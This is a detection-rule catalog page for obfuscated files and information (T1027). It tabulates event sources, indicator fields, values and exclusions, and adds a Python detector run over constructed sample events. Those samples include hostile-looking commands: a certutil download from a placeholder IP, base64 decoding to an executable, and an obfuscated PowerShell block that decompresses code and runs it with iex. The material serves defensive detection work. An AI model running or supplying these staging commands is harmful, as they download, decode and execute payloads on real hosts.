
Obfuscated Files or Information (T1027)

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Events covered

12 catalog events are tagged with this technique by at least one rule.

| Provider | Event ID | Title |
|---|---|---|
| Sysmon | 1 | Process creation |
| Sysmon | 5 | Process terminated |
| Sysmon | 11 | FileCreate |
| Security-Auditing | 4688 | A new process has been created. |
| Security-Auditing | 4689 | A process has exited. |
| Security-Auditing | 4697 | A service was installed in the system. |
| Security-Auditing | 5379 | Credential Manager credentials were read. |
| Defender-DeviceEvents | 9007000 | Defender event (any) |
| Defender-DeviceProcessEvents | 9001000 | Process activity (any) |
| PowerShell | 4103 | Payload Context: ContextInfo User Data: UserData. |
| PowerShell | 4104 | Creating Scriptblock text (MessageNumber of MessageTotal). |
| Service-Control-Manager | 7045 | A service was installed in the system. |

Authoring guide

Patterns shared across the 106 rules tagged with this technique (84 Sigma, 12 Elastic, 4 Splunk, 6 KQL): which fields they filter on, which specific values they look for, and what they exclude. Field names are normalized across vendors, so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row.

Fields filtered most (32 distinct)

The fields most rules look at when detecting this technique. The How column lists the operators authors apply to the field (eq, ends_with, match, regex_match, and so on) and how many rules use each. Sample values are concrete examples to start from, not an exhaustive list.

| Field | Rules | How | Sample values |
|---|---|---|---|
| CommandLine | 38 | match 28, regex_match 8, contains 3, is_not_null 2, in 1, eq 1 | TVqQAAMAAAAEAAA, -f, URL , certutil, base64 --decode |
| Image | 20 | ends_with 20, match 1 | \certutil.exe, \powershell.exe, \pwsh.exe, \ping.exe, \cscript.exe |
| ScriptBlockText | 17 | match 9, regex_match 7, eq 2, ends_with 1 | shellexec_rundll, +, `, {0}, cmd.{0,5}(?:/c\|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\... |
| OriginalFileName | 17 | eq 17 | CertUtil.exe, PowerShell.EXE, pwsh.dll, wscript.exe, Cmd.EXE |
| Payload | 11 | regex_match 7, match 4, ends_with 1 | shellexec_rundll, cmd.{0,5}(?:/c\|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\..., system.io.compression.deflatestream, readtoend, system.io.streamreader |
| ServiceFileName | 11 | match 10, regex_match 1 | cmd, &&, shellexec_rundll, -f, clipboard]:: |
| ImagePath | 11 | match 10, regex_match 1 | cmd, &&, shellexec_rundll, -f, clipboard]:: |
| Esql.script_block_pattern_count | 10 | ge 10 | 1, 2, 20, 5 |
| Provider_Name | 10 | eq 10 | Service Control Manager |
| Esql.script_block_length | 8 | gt 8 | 500, 1000 |
| file.directory | 4 | is_null 4 | |
| EventID | 4 | eq 4 | 4688, 4104, 11 |
| TargetFilename | 4 | ends_with 2, eq 2 | \Windows\Temp\tmp.bat, \gthread-3.6.dll, \sigcmm-2.4.dll, Local\Microsoft\WindowsApps\Get-Variable.exe, "*.exe" |
| TargetName | 3 | match 3 | \Temporary Internet Files\Content.Outlook, Microsoft_Windows_Shell_ZipFolder:filename, order, payment, invoice |
| Esql.script_block_ratio | 2 | gt 1, ge 1 | 0.5, 0.75 |

Top indicator values (569 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. High numbers point to widely used indicators that are noisy on their own and need a second condition for useful signal: on this page, Image ends_with \powershell.exe is shared with 143 rules catalog-wide, whereas OriginalFileName eq CertUtil.exe is shared with only 13. A blank reach means the combination is specific to rules under this technique.

| Field | Kind | Value | Rules (here) | Corpus reach |
|---|---|---|---|---|
| Provider_Name | eq | Service Control Manager | 10 | 43 |
| OriginalFileName | eq | CertUtil.exe | 8 | 13 |
| Image | ends_with | \certutil.exe | 8 | 34 |
| Image | ends_with | \powershell.exe | 8 | 143 |
| OriginalFileName | eq | PowerShell.EXE | 8 | 64 |
| Image | ends_with | \pwsh.exe | 8 | 140 |
| OriginalFileName | eq | pwsh.dll | 8 | 72 |
| Esql.script_block_pattern_count | ge | 1 | 6 | 6 |
| Esql.script_block_length | gt | 500 | 6 | 6 |
| ServiceFileName | match | cmd | 4 | 5 |
| ImagePath | match | cmd | 4 | 5 |
| CommandLine | match | -encode | 3 | 3 |
| ServiceFileName | match | && | 3 | 3 |
| ImagePath | match | && | 3 | 4 |
| ImagePath | match | /c | 3 | 4 |
| TargetName | match | Microsoft_Windows_Shell_ZipFolder:filename | 3 | 3 |
| CommandLine | match | URL  | 3 | 3 |
| CommandLine | match | urlcache | 3 | 3 |
| CommandLine | match | verifyctl | 3 | 3 |
| Esql.script_block_length | gt | 1000 | 2 | 2 |

Common exclusions (11 distinct)

Field/operator/value combinations that rules under this technique exclude (top-level not() clauses). These are the false-positive paths the community has learned to filter out; a new rule that ignores them will likely fire on the same noisy paths. For this technique every exclusion comes from a single rule, and most target script-block content from editor and prompt tooling that looks obfuscated but is benign, such as VS Code's shell-integration escape sequence ($([char]0x1b)]633) and git-prompt module variables.

| Field | Kind | Value | Rules excluding |
|---|---|---|---|
| ScriptBlockText | match | [System.IO.File]::Open('C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender... | 1 |
| ScriptBlockText | match | $([char]0x1b)]633 | 1 |
| ScriptBlockText | match | :::::\\\\windows\\\\sentinel | 1 |
| ScriptBlockText | match | $local:Bypassed | 1 |
| ScriptBlockText | match | origPSExecutionPolicyPreference | 1 |
| ScriptBlockText | match | $s.BranchBehindStatusSymbol.Text | 1 |
| ScriptBlockText | match | GitBranchStatus | 1 |
| ScriptBlockText | match | sentinelbreakpoints | 1 |
| ScriptBlockText | match | GENESIS-5654 | 1 |
| Image | in | "*:\\Windows\\SysWOW64\\*" | 1 |
| Image | in | "*:\\Windows\\System32\\*" | 1 |
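The three tables above (fields filtered most, top indicator values, common exclusions) as minimal detection logic, run over constructed sample events. This is an added example, not code from the catalog or from any of the vendors it aggregates. Field names follow the catalog's normalized names (CommandLine, Image, OriginalFileName, ScriptBlockText); the thresholds, the pattern list and its labels, the subset of exclusions, and every sample event are assumptions made for illustration.

```python
"""Added example (not from the catalog or any vendor's rule set): the field,
indicator and exclusion patterns tabulated above as minimal detection logic,
run over constructed sample events.  Thresholds, pattern labels, exclusion
subset and all sample events are assumptions for illustration."""
import re

# Constructed sample events (not real telemetry).  EventID 1 = Sysmon process
# creation, 4104 = PowerShell script block logging.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\a.txt C:\Users\Public\a.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -hashfile C:\Windows\notepad.exe SHA256"},   # routine admin use
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -c \"[IO.File]::WriteAllBytes('C:\\Users\\Public\\x.exe',"
                    "[Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAA'))\""},
    {"EventID": 4104, "ScriptBlockText":            # format operator, backtick, Deflate, ReadToEnd
        "$x = ('{0}{1}{2}' -f 'Ne','w-Ob','ject');"
        "$s = New-Object System.IO.StreamReader("
        "(New-Object System.IO.Compression.DeflateStream("
        "[System.IO.MemoryStream][Convert]::FromBase64String('" + "A" * 400 + "'),"
        "[System.IO.Compression.CompressionMode]::Decompress)));"
        "i`e`x $s.ReadToEnd()"},
    {"EventID": 4104, "ScriptBlockText":            # VS Code shell-integration prompt hook (benign)
        'function Global:Prompt { $r = "$([char]0x1b)]633;D`a"; $r += "$([char]0x1b)]633;A`a"; return $r }'},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

CERTUTIL_SWITCHES = ("-encode", "-decode", "-urlcache", "-verifyctl")  # CommandLine indicators above
B64_MZ_PREFIX = "TVqQAAMAAAAEAAA"   # base64 of a PE file's leading bytes (MZ header); case-sensitive

# Script-block patterns drawn from the sample values above; labels are this example's own.
OBFUSCATION_PATTERNS = {
    "format-operator": re.compile(r"\{\d+\}"),                                    # ('{0}{1}' -f ...)
    "backtick-escape": re.compile(r"`[a-z]", re.I),                               # i`e`x
    "string-concat":   re.compile(r"'\s*\+\s*'"),                                 # 'Inv'+'oke'
    "deflate-stream":  re.compile(r"system\.io\.compression\.deflatestream", re.I),
    "stream-reader":   re.compile(r"system\.io\.streamreader|readtoend", re.I),
}
# Substrings from the exclusions table: editor and prompt tooling whose script
# blocks look obfuscated (VS Code's OSC 633 shell integration, git prompt modules).
SCRIPTBLOCK_EXCLUSIONS = ("$([char]0x1b)]633", "GitBranchStatus", "$s.BranchBehindStatusSymbol.Text",
                          "origPSExecutionPolicyPreference", "$local:Bypassed", "sentinelbreakpoints")
MIN_BLOCK_LENGTH = 500     # Esql.script_block_length gt 500
MIN_PATTERN_COUNT = 1      # Esql.script_block_pattern_count ge 1


def is_certutil(ev):
    """OriginalFileName eq CertUtil.exe OR Image ends_with \\certutil.exe.
    Both are checked because a renamed binary keeps its OriginalFileName."""
    return (ev.get("OriginalFileName", "").lower() == "certutil.exe"
            or ev.get("Image", "").lower().endswith("\\certutil.exe"))


def process_indicators(ev):
    """Process-creation events: certutil encode/decode/download switches, or a
    base64-encoded PE header carried on any command line.  Returns the hits."""
    cl = ev.get("CommandLine", "")
    hits = [s for s in CERTUTIL_SWITCHES if s in cl.lower()] if is_certutil(ev) else []
    if B64_MZ_PREFIX in cl:
        hits.append("base64-mz-header")
    return hits


def script_block_verdict(ev):
    """Script-block events: apply exclusions first, then the length and
    pattern-count thresholds together (either alone is too noisy)."""
    text = ev.get("ScriptBlockText", "")
    if any(marker in text for marker in SCRIPTBLOCK_EXCLUSIONS):
        return {"verdict": "excluded", "length": len(text), "patterns": []}
    patterns = [name for name, rx in OBFUSCATION_PATTERNS.items() if rx.search(text)]
    alert = len(text) > MIN_BLOCK_LENGTH and len(patterns) >= MIN_PATTERN_COUNT
    return {"verdict": "alert" if alert else "clean", "length": len(text), "patterns": patterns}


def triage(events):
    """Route each event by EventID and return one verdict dict per event."""
    results = []
    for ev in events:
        if ev["EventID"] == 4104:
            results.append(script_block_verdict(ev))
        else:
            hits = process_indicators(ev)
            results.append({"verdict": "alert" if hits else "clean", "hits": hits})
    return results


if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(ev["EventID"], res)
```

The certutil check deliberately pairs a process identity (OriginalFileName or Image) with an abuse switch from the CommandLine indicators, which is what the Corpus reach column argues for: the identity alone matches every hash check and certificate query an administrator runs, and the script-block rule likewise fires only when length and pattern count both exceed their thresholds and no exclusion marker is present.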

Rules under this technique

Every rule in the catalog tagged with this technique, counted by vendor (each rule's full predicates, exclusions, and indicators are recorded on the rule's own catalog entry):

- Sigma: 84 rules
- Elastic: 12 rules
- Splunk: 4 rules
- Kusto Query Language: 6 rules